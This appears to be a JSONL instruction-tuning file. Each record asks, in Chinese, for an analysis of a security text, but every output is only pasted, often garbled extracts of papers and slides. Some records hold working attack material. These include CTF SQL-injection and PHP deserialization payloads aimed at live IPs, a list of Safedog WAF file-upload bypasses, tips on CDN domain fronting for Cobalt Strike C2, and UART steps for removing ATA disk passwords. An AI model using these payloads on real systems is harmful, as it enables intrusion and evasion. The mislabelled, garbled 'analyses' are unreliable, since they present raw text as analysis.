{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n- 1 - Limitations of OAS-Based Blocking - 1 - Table of Contents Executive Summary 2 APIs - the attack is also the route to protection 3 Using OAS for Security 3 Limitations of OAS-Based Blocking 4 Summary 8 - 2 - Executive Summary The OpenAPI Specification (OAS) (fka Swagger) helps developers and security teams alike catalog, document, and describe REST APIs. However, OAS-based security tools alone address only a small fraction of the risk created with APIs and cannot help you prevent API breaches or data loss. When implemented in a more stringent mode, OAS-based security tools will block legitimate traffic, negatively impacting your customers, partners, and business operations, including revenue streams. The following summaries capture the risks of depending on OAS for securing your APIs as well as the ways in which the Salt Security solution provides comprehensive protection. OAS Cannot Protect Against the Most Common and Critical API Threats  OAS lacks understanding of API logic, and organizations cannot create an OAS policy to prevent attacks targeting API logic such as the top threats defined in the OWASP API Security Top 10.  Salt Security uses big data and patented AI to establish a granular understanding of the unique logic for each API and stops attacks with full coverage of the OWASP API Security Top 10. OAS Can Be Tricked and Bypassed  OAS lacks context of overall attacker activity and therefore can block only a specific API call, not the attacker, allowing attackers to make endless attempts to bypass OAS schema validation.  Salt Security correlates all attack activity from the same user, allowing security teams to pinpoint and block attackers early during their reconnaissance before attacks are successful. OAS Risks Blocking Legitimate Traffic or Missing Attacks  OAS supports different validation techniques, each of which presents a challenge:  Using Strict Validation blocks any abnormal API call, including a parameter value pattern mismatch, unknown par", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWriteup - Nu1L Writeup - Nu1L WEB laravel do you know zzm's blog hate-php MISC run loop mc philosopher Welcome to 5space CRYPTO tinysocks rosb PWN pwnme twice of REVERSE nop ManageCode rev WEB lib/webuploader/0.1.5/server/preview.php curl http://119.3.183.154/daochu.php\\? type\\=1\\&imei\\=aaa\\&imei2\\=ttt%22union%20select%201,2,3,4,5,\\ (hints\\)%20from%20hint%23 hint see_the_dir_956c110ef9decdd920249f5fed9e4427 exp e98a4571cf72b798077d12d6c94629.php http://119.3.183.154/956c110ef9decdd920249f5fed9e4427/lib/webuploader/0.1.5/serve r/e98a4571cf72b798077d12d6c94629.php?file=/flag flag laravel <?php namespace Symfony\\Component\\Routing\\Loader\\Configurator { class ImportConfigurator { private $parent; private $route; public function __construct($parent) { $this->parent = $parent; $this->route = \"cat /flag\"; do you know curl http://121.36.64.91/index.php? a=%66%69%6c%65:///var/www/html/%66%6c%61%67.php&b=%66%69%6c%65:///var/www/html/%6 6%6c%61%67.php zzm's blog pom.xml commons-collectionsmysql-connector-java com.fasterxml.jackson.core 2.9.8 } } } namespace Faker { class Generator { protected $formatters = array(); public function __construct($formatters) { $this->formatters = $formatters; } } } namespace { $a = new Faker\\Generator(array(\"addCollection\" => \"system\")); $b = new Symfony\\Component\\Routing\\Loader\\Configurator\\ImportConfigurator($a); echo urlencode(serialize($b)); } https://webcache.googleusercontent.com/search? q=cache:CMivvJLKcbkJ:https://b1ue.cn/archives/189.html+&cd=1&hl=zh- CN&ct=clnk&gl=us JDBC url MySQL JDBC https://github.com/fnmsd/MySQL_Fake_Server mysql {\"id\": [\"com.mysql.cj.jdbc.admin.MiniAdmin\", \"jdbc:mysql://ip:port/test? autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatu sDiffInterceptor&user=yso_CommonsCollections7_ping test.com\"]} shell hate-php view-source:http://121.36.74.163/?code=(~%8C%86%8C%8B%9A%92) (${%a7%ae%ac%ac%f8%e9%e9%f8}{%a7})&%a7=cat%20flag.php MISC run binwalk -erun.exe tif ps run.exe flag{} loop mc rc4xxte", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n报告初稿完成时间2017 年 1 月 13 日 16 时 00 分 首次发布时间2017 年 1 月 16 日 10 时 00 分 本版本更新时间2017 年 1 月 25 日 14 时 30 分 方程式组织 EQUATION DRUG 平台解析 方程式组织系列分析报告之四 安天安全研究与应急处理中心Antiy CERT 目 录 1 本版本更新小语 ................................................................................................................................................... 1 2 背景...................................................................................................................................................................... 1 3 方程式线索曝光和分析成果时间链梳理 ............................................................................................................. 2 4 DANDERSPRITZ 攻击平台 ..................................................................................................................................... 4 5 部分组件与插件分析继续完善中................................................................................................................ 11 5.1 PROCESSINFO 插件遍历进程模块 ........................................................................................................................ 13 5.2 KILL_IMPLANT 插件杀进程模块 ........................................................................................................................... 16 5.3 GROK 键盘与剪贴版记录器驱动 ..................................................................................................................... 16 6 小结..................................................................................................................................................................... 20 附录一参考资料 ...................................................................................................................................................... 22 附录二关于安天 ...................................................................................................................................................... 24 方程式组织 EQUATION DRUG 平台解析 安天版权所有欢迎无损转载 第 1 页 1 本版本更新小语 安天在此前发布的报告版本的基础上增加了一个方程式组织主机作业的模块积木图这个积木图初 步展示了一个将主机情报作业按照原子化拆分的模块组合的拼装在本版本中安天 CERT 也细化", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0x00 背景 前的攻防场景攻击成本的节约周期短成果要求成了普遍要对的问题所以 对于基础设施的建设越来越重视键动化的部署CSFrp gen等具的开发节省了以 前略的搭建配置时间变相增加攻击有效时间优化的Profile如修改些默认标记 位流量伪装关闭stager等成熟的OPSEC如杀软度测试攻击法检测测试上传 件清除流程等减少了免杀难度系数增加溯源难度的同时也减少团队协作中执了 些被杀软标记的攻击式导致掉点的可能性前两天刚好聊到域前置的节点域名收集及验 证内部以前也简单分享过遂炒冷饭 0x01 CDN and 域前置的原理 只要别 ping cdn 节点然后HTTP Hosts放堆IP不域名就求求了放过队 友吧关于原理科普不是重点略 0x02 CDN滥域名抢注 CDN滥域名抢注腾讯云->云产品->CDN与加速->内容分发络->域名管理->域名管理 1> 添加域名涉及到抢注问题必要不抢注主域名前已经有名单针对些域名添 加了归属权校验 2> 项优先使当前标主域名进加速域名可以为存在的域名如www.xxx.co m.若抢注失败则优先考虑正常电脑会产外连的域名如软件视频杀软搜索引擎 等 3> 域名必须是真实存在已经在信部进过备案的 域名配置添加 0x03 寻找同CDN下可以进流量转发的域名 如何寻找同CDN下可以进流量转发的域名呢 这个其实是本次分享重点想讲的东CDN的原理中DNS系统会最终将域名的解析权 交给CNAME(CDN商域名)指向的CDN专DNS服务器CDN的DNS服务器将CDN的全局 负载均衡设备IP地址返回标机器那就代表着我们的CDN负载的IP历史解析中是否会有 这样符合标准的域名呢 1>第种简单的法站之家的ping功能去ping CNAME记录 (sdwdsdw.xxxxx.com.w.kunlunca.com),然后使威胁平台如TI微步在线等进ip解析 域名查询 PS验证法curl -k -v https://oss.takeoa.com -H \"Host: sdwdsdw.xxxxx.com\" 并查看CS的web log是否有请求记录 2>第种法涉及到国内各CDN商CNAME后缀我们观察阿或者腾讯的CDN申 请以后的CNAME后缀都是有定规则或者说固定域名的 xxxx.xxx.com.dsa.dnsv1.com xxxx.xxx.com.w.kunlunca.com 我们通过 nslookup www.cdn.dnsv1.com 可以获得使最近CDN节点的公IP 然后获取其他也托管在该商并使CDN的合法域名(如xxxxx) 通过威胁情报查询这两个ip或www.cdn.dnsv1.com查看历史解析 这些ip上的历史解析都可以可以继续追寻IDC寻找 m.leha.com.cdn.dnsv1.com具有.cdn.dnsv1.com的域名去掉后边访问前是否 具有https绿标证书 先简单的说两种法其实这两种可以扩张很多种tips 0x04 简单流量分析及名单 0x05 结尾 中间可能还有些如Window机器通过Powershell域前置拉取脚本上线CrossC2通 过域前置上线Linux机器等些tips我想家也都会就不嫌丑了具体的络为分析 及流量分析检测及解决办法也都略掉了关于之前聊的名单出场景就仁者仁智 者智了过的都说好", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n代 码 混 淆 研 究 的 新 方 向 程瑞 西安交通大学软件学院 南子龙 西安交通大学微电子学院 范铭 西安交通大学网安学院 # 我们是谁  程瑞 西安交通大学软件工程学院大二 智能网络与网络安全教育部重点实验室实习生 研究方向包括程序分析模糊测试恶意软件检测IoT  南子龙 西安交通大学微电子学院大四 智能网络与网安安全教育部重点实验室实习生 研究方向包括IoT安全密码学应用量子器件同态芯片  范铭 西安交通大学网络空间安全学院副教授 研究方向包括可解释性AI技术AI安全移动软件安全 # 目录  PART I程瑞  引言代码混淆的定义以及应用  现状研究现状  动机已有研究存在的不足  方法我们提出的若干改进方法  实验实验验证我们提出的方法是否有效  PART II南子龙  同态加密 & 混淆电路  前沿密码学成果如何在代码混淆研究中落地化 引言 代码混淆的定义以及应用 # 代码混淆的定义 O(P) = P P P  P vs P 分析难度增加  更多的流程转移指令  更多的算术运算指令 语义应是相等  接收相同且合法的输入P与P产 生相同输出  P的执行环境 不可信环境  任意时刻中断程序修改代码  任意时刻读/写程序内存 代码混淆 恶意软件 数字版权保护  APT载荷  C2客户端  蠕虫木马    VMProtect  Themida  O-LLVM   # 代码混淆的应用 现状 学界与业界的研究现状 # 代码混淆的分类  控制流混淆 变换程序控制流, 使程序控制结构变得更加复杂  数据流混淆 变换程序数据流, 使程序数据流向变得更加复杂  布局混淆 删除或修改二进制程序中对攻击者有效的信息, 如调试信息等  预防性混淆 针对某种特定的反混淆工具或方法的混淆方法 [1]Collberg C, Thomborson C, Low D. A taxonomy of obfuscating transformations[R]. Department of Computer Science, The University of Auckland, New Zealand, 1997. # 逻辑门  VMProtect万用门 Nand Nor  量子逻辑门 或许也是三输入门 Fredkin Toffoli  三输入门 AOI OAI # 足够安全吗 源文件 编译优化后 x86-64 Clang 12.01, -O3 # 三输入门 源文件 编译优化后 那么 # 为什么不安全  三输入门 vs 二输入门 AOI(a, b, -1) = ~(a|(b&-1)) = ~(a|b) = Nor(a, b), b & -1 = b b & -1 = b, a & 0 = 0, a | 0 = a, , 那么 从内联角度来看, 三输入门 等 价于 二输入门  击败二输入门 布尔代数中明确的运算规则 A + AB = (1 + A)B = A (A + B)(A + C) = A + AC + AB + BC = A + BC  LLVM InstCombine Pass lib/Transforms/InstCombine/Inst CombineAndOrXor.cpp # 不透明谓词 原程序控制流 混淆后  不透明谓词 永真/假型 插入的后继基本块中必有一个不被执行 可真可假型 插入的两个后继基本块的语义应相同 基本块1 基本块2 基本块1 基本块2 基本块3 # 安全性的问题  O-LLVM  x * (x + 1) % 2 == 0    Angr检测出它们所需时间极短[1]  基于API构造  CreateFile接受错误输入返回0    可以拓展符号执行工具为API实现输入正确性检测 [1]Manufacturing resilient bi-opaque predicates against symbolic execution, Hui Xu, Yangfan Zhou, Yu Kang, Fengzhi Tu and Michael R. Lyu, in Proc. of the 48th IEEE/IFIP International Conference on Dependable Systems and Networks (DSN), Luxembourg City, Luxembourg, June 1-5, 2018. # RANGE DIVIDER [1]Banescu S, Collberg C, Ganesh V, et al. Code obfuscation against symbolic execution attacks[C]//Proceedings of the 32nd Annual C", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 二十漏洞报告 > 作者Peter Yaworski > 译者[飞龙](https://github.com/) > 协议[CC BY-NC-SA 4.0](http://creativecommons.org/licenses/by-nc-sa/4.0/) 所以这一天终于来了你发现了你的第一个漏洞 首先恭喜你 认真来讲发现漏洞并不容易但是有一些不爽的事情 我的第一条建议是放松不要过度兴奋 我知道在提交报告时的极度兴奋感以及当你被告知它不是漏洞公司关闭了漏洞报告损害了你在漏洞平台上的声望被拒绝的沮丧感我想帮你避免它们所以第一件事是首先 ## 阅读披露准则 在 HackerOne 和 Bugcrowd 上每个参与公司都列出了范围内外的程序希望你先阅读它们以免你浪费时间 但是如果没有请现在阅读 确保你发现的是未发现的而不在他们的程序之外 这是我以前的一个痛苦的例子 - 我在 Shopify 发现的第一个漏洞如果你在文本编辑器中提交格式不正确的 HTML其解析器就会对其进行更正并存储 XSS 我非常兴奋因为我的挖掘是有回报的 我无法足够快地提交报告 太好了我点击提交等待我的 500 美元的奖金 相反他们礼貌地告诉我这是一个已知的漏洞他们要求研究人员不要提交 然后这个工单被关闭了我失去了 5 分 我想钻进洞里这是一个惨痛的教训 从我的错误中学习要阅读准则 ## 包含细节之后包含更多东西 如果你希望认真对待报告请提供详细的报告其中至少包括 + 用于查找漏洞的 URL 和任何受影响的参数 + 浏览器操作系统如适用和/或应用程序版本的说明 + 对感知影响的描述 这个 bug 可能如何被利用 + 重现错误的步骤 这些标准对于 Hackerone 的主要公司来说都很常见包括雅虎TwitterDropbox 等如果你想更进一步我建议你添加屏幕截图或视频验证POC 两者都对公司有很大帮助并将帮助他们了解漏洞 在这个阶段你还需要考虑该网站的影响 例如由于用户和交互数量众多Twitter 上存储的 XSS 可能是一个非常严重的问题 相比之下一个交互有限的站点可能不会将这个漏洞视为严重不同的是敏感的网站如 PornHub 的隐私泄露可能比在 Twitter 上更重要后者大多数用户信息已经是公开的而不会尴尬 ## 确认漏洞 你已阅读准则你已经起草了你的报告你已经添加了截图等一下并确保你的报告实际上是一个漏洞 例如如果你要报告公司在其标题中没有使用 CSRF 令牌那么你是否看到了要传递的参数是否包含一个像 CSRF 令牌一样的标记但是标签不一样 在提交报告之前我无法鼓励你确保已经验证了此漏洞 考虑你所发现的重要漏洞只是让你意识到你在测试时弄错了一些东西这非常令人失望 在你提交该漏洞之前请自行决定是否需要额外的时间并确认该漏洞 ## 尊重厂商 根据 HackerOne 公司创建的测试流程是的你可以作为研究人员进行测试当公司启动新的漏洞奖励计划时它们可能会收到大量报告 提交之后让公司有机会审查你的报告并回复你 一些公司在他们的奖励准则上发布时间表而其他公司则没有 平衡你的兴奋与他们的工作量 根据我与 HackerOne 支持者的对话如果你在至少两周内没有收到公司的消息他们将帮助你进行跟进 在你选择这条路线之前在报告上发布礼貌的消息询问是否有更新 大多数时候公司会回应并让你了解情况 如果他们并没有留出太多时间在问题升级之前再试一次 另一方面如果公司已经确认了这个漏洞一旦完成与他们一起确认修复 在写这本书的时候我很幸运地和 Adam Bacchus 聊天他是截至 2016 年 5 月的 HackerOne 团队的新成员任首席奖励官我们的对话真的让我开阔了眼界 在他的背景中Adam 拥有 Snap Chat 和 Google 的工作经验在 Snap Chat 时他衔接了安全团队和其他软件工程团队在 Google 时他在漏洞管理团队工作并帮助执行 Google 漏洞奖励计划 亚当帮助我理解了运行奖励计划时有一些分析者会遇到的问题包括 + 噪音不幸的是漏洞奖励计划会收到大量无效的报告HackerOne 和 BugCrowd 都已经写过这个 我知道我绝对有贡献希望这本书可以帮助你避免这个问题因为提交无效报告会为你和奖励计划浪费时间和金钱 + 优先级漏洞计划必须找一些方法来为漏洞修复排序 当你有多个具有类似影响的漏洞但报告持续不断进入时这非常困难奖励计划面临严峻的挑战 + 验证在分析报告时必须验证漏洞 这就是为什么我们的黑客必须提供明确的指示并解释我们发现的内容如何重现它以及为什么它是重要的 只是提供一个视频并不能切中它 + 资源并不是每个公司都能雇得起全职工作人员来运行奖励计划 有些计划很幸运有专门的人对报告做出回应而其他计划则由工作人员兼任 因此公司可能会有轮流的时间表", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHome%Insecurity:%No%alarm,%False% alarms,%and%SIGINT% Logan&Lamb& lamblm@ornl.gov& & Agenda%  Mo/va/on&  Models&and&Methodology&  A7ack&Primi/ve&Implementa/on&  Applica/on&to&three&security&systems&  Observa/ons&  Conclusion& Who%am%I?%  Researcher&for&Center&for&Trustworthy& Embedded&Systems&at&ORNL&  Focus&on&V2X&currently&  Ongoing&privacy&research&involving& intelligent&transporta/on&systems& Home%Security%System%Value%  Ostensibly&protects&your&home&and& occupants&from&intruders!&  Previous&hacks&  Disable&Sensors&  Control&GSM&  ZPWave&(Home&Automa/on)&  Lower&insurance&premiums!& & Mo@va@on%  Complete&dominance&of&the&security& system&  Render&it&useless&  If&possible,&make&owning&a&security&system&a& liability& Mo@va@on%  Covert&Infiltra/on&and&Exfiltra/on&  Monitor&Behavior&  Induce&Behavior& Mo@va@on%  Covert&Infiltra/on&and&Exfiltra/on&  Monitoring&Company&  Occupants&  Monitor&Behavior&  Induce&Behavior& & Mo@va@on%  Covert&Infiltra/on&and&Exfiltra/on&  Monitor&Behavior&  Par/cular&Occupants&(be7er&for&homes)&  Aggregate&(be7er&for&businesses)&  Induce&Behavior& & Mo@va@on%  Covert&Infiltra/on&and&Exfiltra/on&  Monitor&Behavior&  Induce&Behavior&  Monitoring&Company&  Occupants& & MODELS%AND%METHODOLOGY% Adversary%Model% Desires.&  General&solu/on&  High&Yield&  Cheap& Adversary%Model% Desires.&A&WIRELESS&hack!&  General&solu/on&  High&Yield&  Cheap& Adversary%Model% Desires.&A&WIRELESS&hack!&  General&solu/on&  Bet&the&sub&GHz&RF&is&similar&across& manufacturers&and&super&vuln&!&  High&Yield&  Cheap& Adversary%Model% Desires.&A&WIRELESS&hack!&  General&solu/on&  High&Yield&$$$&  Everything&is&going&wireless!&  Cheap& S& Adversary%Model% Desires.&A&WIRELESS&hack!&  General&solu/on&  High&  Cheap&  SDRs&are&ge]ng&cheaper,&soware&is&cheap& Adversary%Model% Desires.&  Covert&Infiltra/on&and&Exfiltra/on& Accomplish&with&Replay%  Monitor&Behavior& Accomplish&with&Replay%  Induce&Behavior& Accomplish&with&Replay% Adversary%Model% Desires.&  Covert&Infiltra/on&and&Exfiltra", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSlide: 1 Meta-Post Exploitation Val Smith (Valsmith@offensivecomputing.net) Colin Ames (amesc@offensivecomputing.net) Using Old, Lost, Forgotten Knowledge Slide: 2 Valsmith  Affiliations:  Offensive Computing  Metasploit  cDc  Work:  Malware Analyst  Reverse Engineer  Penetration Tester  Exploit developer Slide: 3 Colin Ames  Security Researcher, Offensive Computing  Steganography Research  Penetration Testing  Reverse Engineering  Malware Analysis Slide: 4  What is this?  Follow up to Vals and HD Moores Tactical Exploitation talk from last year  A talk about the use of automation and tactical tools post-exploitation  Applied techniques  Good for LARGE environments  Different perspectives: some old, some forgotten, some new Slide: 5 Post Exploitation Concepts Overview Slide: 6 What Is Post Exploitation?  Its what you do after you get root  Note: This talk assumes you have access  Includes  Password Management  Persistence  Stealth / Evading Detection  User Identity Theft  Feature Modification  Automation & Mass 0wnage Slide: 7 What Is Post Exploitation?  Getting root is just the beginning  How do you spread?  How to manage assets as you go along?  Lots of tools to help you get root:  Metasploit, Core, Canvas, Stand alone  But what about after breaking in  Lots of random tools  Little automation / standardization  Archaic, hard to use, poorly documented  Maliciousness often obvious  Not Scalable to 1000s of hosts (ignoring botnets for this talk) Slide: 8 Password Management Slide: 9 Why Password Management?  Large pentests, 1000s of passwords  Testing a cracked password on many systems can be time consuming  Keeping track of cracking sessions  Building and growing your wordlist lets you crack faster  Aids in cleanup stage  Tying accounts to systems Slide: 10 Password Management Goals  Acquired password storage  Organization and tracking  What passwords go with which hosts  What passwords are shared  Which users have access to what resources  Re-use for further access", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nKarl Koscher  @supersat Eric Butler  @codebutler Rev: July 8, 2013 Updated slides available from defcon.org and http://simhacks.github.io/  Applications live on your SIM card  Phones are dumb hosts  UI and connectivity only  Telcos own the SIMs, so they control the applications 2  These are called SIM Toolkit (STK) applications  Used widely in the developing world  Mobile banking, etc.  Very little documentation on how they work, or how to develop them 3  Toorcamp 2012 had its own GSM network  SIM cards supported SIM Toolkit, so why not explore it?  After lots of research, finally figured out how to program the *#$!ing things  Learn from our misery 4  SIM cards are a lot more powerful than you might have imagined  Development of STK apps is the same as Java Cards  you can use unlocked STK SIMs as cheap smart card development platforms  Maybe if people care enough, SIMs can be better utilized (e.g. secure storage of SSH keys, BitCoins, phone decryption keys) 5  Rudimentary UI  display text, menus, play tones, read input  Send SMSes, initiate calls, initiate and use data services  Receive and act on events, such as call connected, call disconnected, etc.  Interact with the rest of the SIM card  Run arbitrary AT commands on the phone 6  Working our way up the technology stack:  Smart cards  Java Card  GlobalPlatform  SMS  SIM Toolkit API 8  ISO 7816-1: Physical characteristics  ISO 7816-2: Electrical contacts  ISO 7816-3: Electrical interface, Transmission Protocol Data Units (TPDUs)  T=0: Byte-oriented protocol  T=1: Block-oriented protocol  ISO 7816-4: Standard commands, Application Protocol Data Units (APDUs)  ISO 14443-4: T=CL: APDUs over RFID Smart Card Pinout from Wikimedia Commons: https://en.wikipedia.org/wiki/File:SmartCardPinout.svg 9  Command APDU 10 Class MSB LSB Instruction Param 1 Param 2 Data Length Length Expected Optional Command Dependent Standard structure and CLS/INS - RFU - Standard structure, custom INS, standard CLS Standard unless specd by conte", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n酒票 35 贡献 0 积分 46 注册时间 2013-1-31 发消息 c4rt1y 九零元老 发表于 2016-4-17 06:31:25 | 只看该作者 表哥已经在https://forum.90sec.org/forum.php?mod=viewthread&tid=9133这里写了一些方法今晚在看别人的代 了于是乎今晚测试了下安全狗的上传发现方法还是如此依旧没任何变化当然我们只拿安全狗为案列因为方 过狗方法这里感谢keio牛文档我虽然也做了类似的但是排版没你的好就拿你的放上去了 默认状态 [Bash shell] 纯文本查看 复制代码 突破0 [Bash shell] 纯文本查看 复制代码 突破1 去掉双引号 [Bash shell] 纯文本查看 复制代码 突破2 添加一个filename1 [Bash shell] 纯文本查看 复制代码 突破3 form中间+ [Bash shell] 纯文本查看 复制代码 突破4 大小写 [Bash shell] 纯文本查看 复制代码 1 2 3 ------WebKitFormBoundary2smpsxFB3D0KbA7D Content-Disposition: form-data; name=\"filepath\"; filename=\"a.asp\" Content-Type: text/html 1 2 3 ------WebKitFormBoundary2smpsxFB3D0KbA7D Content-Disposition: form-data; name=\"filepath\"; filename=\"[0x09]a.asp\" Content-Type: text/html 1 2 3 ------WebKitFormBoundary2smpsxFB3D0KbA7D Content-Disposition: form-data; name=\"filepath\"; filename=a.asp Content-Type: text/html 1 2 3 ------WebKitFormBoundary2smpsxFB3D0KbA7D Content-Disposition: form-data; name=\"filepath\"; filename=\"a.asp\";filename1=\"test.jpg\" Content-Type: text/html 1 2 3 ------WebKitFormBoundary2smpsxFB3D0KbA7D Content-Disposition: f+orm-data; name=\"filepath\";filename=\"test.asp\" Content-Type: text/html 1 2 3 ------WebKitFormBoundary2smpsxFB3D0KbA7D ConTent-Disposition: form-data; name=\"filepath\"; filename=\"a.asp\" Content-Type: text/html 突破5 去掉form-data [Bash shell] 纯文本查看 复制代码 突破6 在Content-Disposition:后添加多个空格 或者在form-data;后添加多个空格 [Bash shell] 纯文本查看 复制代码 [/mw_shl_code] 突破7 a.asp . (空格+.) [Bash shell] 纯文本查看 复制代码 [/mw_shl_code] 突破8 \"换行 [Bash shell] 纯文本查看 复制代码 突破9 NTFS流 [Bash shell] 纯文本查看 复制代码 突破10 经过对IIS 6.0的测试发现其总是采用第一个Content-Disposition中的值做为接收参数而安全狗总是以 求[上传test.asp成功] [Bash shell] 纯文本查看 复制代码 1 2 3 ------WebKitFormBoundary2smpsxFB3D0KbA7D ConTent-Disposition: name=\"filepath\"; filename=\"a.asp\" Content-Type: text/html 1 2 3 [mw_shl_code=bash,true]------WebKitFormBoundary2smpsxFB3D0KbA7D ConTent-Disposition: form-data; name=\"filepath\"; filename=\"a.asp\" Content-Type: text/html 1 2 3 [mw_shl_code=bash,true]------WebKitFormBoundary2sm", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSOCIAL ZOMBIES Your Friends Want to Eat Your Brains STARRING... TOM ESTON KEVIN JOHNSON Social Networks The New Hotness 225 Million Users 110 Million Users Grew 752% in 2008! 8 million visitors in march 2009 Social networks & Blogs are now the 4th most popular online activity, ahead of personal email. -Nielsen Online Report, March 2009 How do socnets make $$? Its in your Profile!  More information you share...more $ $ its worth!  Targeted advertising  Sell your Demographic Info  Sketchy Privacy/ToS Policies.... In Social networks we Trust... Trust is Everything!  Its how social networks work  More trust, the better for the socnet!  Attackers LOVE trust relationships! Fake Profiles Its built to Exploit Trust  Who is the person behind the account?  Bots are Everywhere  Accounts are easy to create  Socnet User Verification = FAIL  Connections based on other friends Privacy Concerns 25 Random Things About You...  Im your friend, I want to know more about you!  Innocent?  These are PASSWORD RESET QUESTIONS people!! Corporate Espionage?  Very effective in a Penetration test  Socnet Information = GOLD  Information Leakage on a Mass Scale! Default Privacy Settings  Wide Open for a reason!  Facebook has very good controls...but...  Do you know where they are?  Do your Friends/Family?  Do They Care? Security Concerns  Socnets are #1 Target for Malware  Spam  Disinformation  XSS, CSRF and more! Twitter Clickjacking & XSS Return of Koobface  Recycled ExploitS  Exploits Trust  STILL EFFECTIVE! Social Network Bots Delivery VIA Socnet API  Twitter Bots (n0tab0t, Realboy)  Automated tools and scripts... Automated Tools Pay Services Social Network Botnets? Facebot POC  Malicious Facebook APplication (looks normal)  Turns your PC into a Bot used for DDOS! Introducing... Kreios C2 Kreios C2 Demo Browser Based Bots Browsers and Features... Oh My!  Browsers are getting more feature-rcih  Read that as more vulnerable!  Forget exploiting vulns  Abuse the features we are provided Browser Z", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n解析 儲存embedded架構原理理實現漏洞洞與反制 傳台灣某公司主控 SSD 藏後門銀監會要求調查\" 這是真實的嗎? 儲存裝置有後門嗎? 如果有哪又是怎樣的狀狀況我們要怎樣防範 前言 Thx Hitch 2015 ,2012 講師 工信部高級資料恢復工程師 ACELab Raid ,Flash 認證 OSSLab 開放軟體實驗室創辦人 講師介紹 儲存裝置上的嵌入式架構 CPU Core RAM ROM 碟片上的韌體架構 硬碟載入 啟動流程 (以WD為範例例)  MCU ROM bootstrap  內部或是外在SPI ROM  碟片上的Module 01 Index 碟片上ATA 微代碼( Module 11)  碟片上其他完整微代碼+匹配參參數  所以硬碟如同一個 embedd system 不同的是 儲存韌體地方會二個位置ROM跟碟片 WD 模塊列列表 硬碟embeddedsystem 架構 模塊是硬碟碟片上韌體跟匹配參參數分類 比如說 序號,型號,ATA密碼是存在專門 模塊,而不是在PCB 有分重要級數 重要模塊一丟失 資料一 去不復返 中斷硬碟啟動流程 硬碟安全系統正常啟動 就會進入 安全系統鎖住硬碟 韌體損壞硬碟則是載入錯誤韌體到一半,造成硬碟本體當 機. 因此 打斷正常啟動流程 可用於破解儲存安全保護與資料救援嚴重損壞韌體 公開的T10 文件就有說明 Something (e.g., a bit, field, or code value) that is not defined by the standard and may be used differentlyn various implementations. 讀寫韌體,ROM操作等特別操作就要用工廠指令集 工廠指令集的原由:生產與維修 ATA Vendor-specific command (工廠指令集) CDB (Command Descriptor Block) 儲存裝置安全保護 ATA 保護 AES 加密 韌體 保護 ATA 加密 AES 加密 ＷＤ ＡＥＳ 暴暴力力破解 我在路路上撿到工廠指令手冊 請你跟我這樣做(一) 請你跟我這樣做(二) Serial UART 應用 Linux終端操作 路路由器或者ADSL韌體升級 硬碟低階操作維修 單晶片 (MCU) 程式下載如STC 51單晶片 需要的線材與工具 杜邦接頭(母), 1P的三根 莫士端子(母)2.00mm, 4P排座 USB to TTL板 (拿Arduino也可替代) Serial TTL (UART)通訊  以一台ARM NAS 做範例例 逆向Serial UART腳位  最好抓的是GND  先將embeeded system斷電 GND一是大塊金金屬點 或是電源座 負極. 會導通 數位型三用電表轉 到 二極體測試檔位(可做導通測試 有通會發聲)  另外一邊探針 則每個Pin都試, 發 現第一根有跟接地點導通, 會翁 鳴 因此第一根為GND GND腳位判定  這時embedded system 再通電 把探針一根固定放 GND 測試每根與第一根已知 GND 相通電呀 發現當 1,4 腳位通電時3.3V或5V  表示第四根為 VCC RX TX , 就 為中間二根先顯 示有字串串再調速度 用2400~115200 慢慢試 分析出腳位 Seagate UART接線法 發出VSC與串串口指令的設備 工廠串串口指令 前面工廠手冊有讀寫韌體操作指令 使用Terminal 並且支援Y-Modem協定的軟體 指令 r 為讀取硬碟韌體系統文件 w 為寫入硬碟韌體系統文件 r30a==>讀出模塊30a, w30a==>寫入模塊30a 硬碟韌體讀寫指令 抓取所有硬碟韌體文件 翻遍了了技術文件找不到哪邊有密碼相關module 就全部抓取出來來 把所有抓出的韌體區塊做比對 發現韌體的30A系統 文件存放ATA密碼 找一樣型號硬碟30A 再用終端回寫回去 即可關閉ATA密碼 看看專業怎做的 發現PC3000 並不是 使用修改 ATA密碼並 沒有改變 但是有類似 ATA密碼開關,位置在 30a韌體系統文件 offset 0x56和0x57 只要改為0000 再用終端回寫回去 即可關閉ATA密碼 分析專業設備的方法 Live demo 用串串口破解IBM 筆記型電腦 硬碟加密 1.熱交換 2.ROM中的韌體缺陷表 都是利利用打斷正常啟動流程 其他方法 如何獲得硬體用的工廠指令集 泄露的工廠技術文件 測錄會發出工廠指令軟硬體 逆向工程 窮舉Fuzzer指令集 泄露的工廠技術文件 比如剛剛前面希捷的文檔 就有詳細終端指令與ATA 工廠指令 Sniffer會發出VSC 的軟硬體 一.工廠內部軟體 二.韌體升級軟體 三.非官方資料", "category": "text_analysis", "source": "security_papers"}
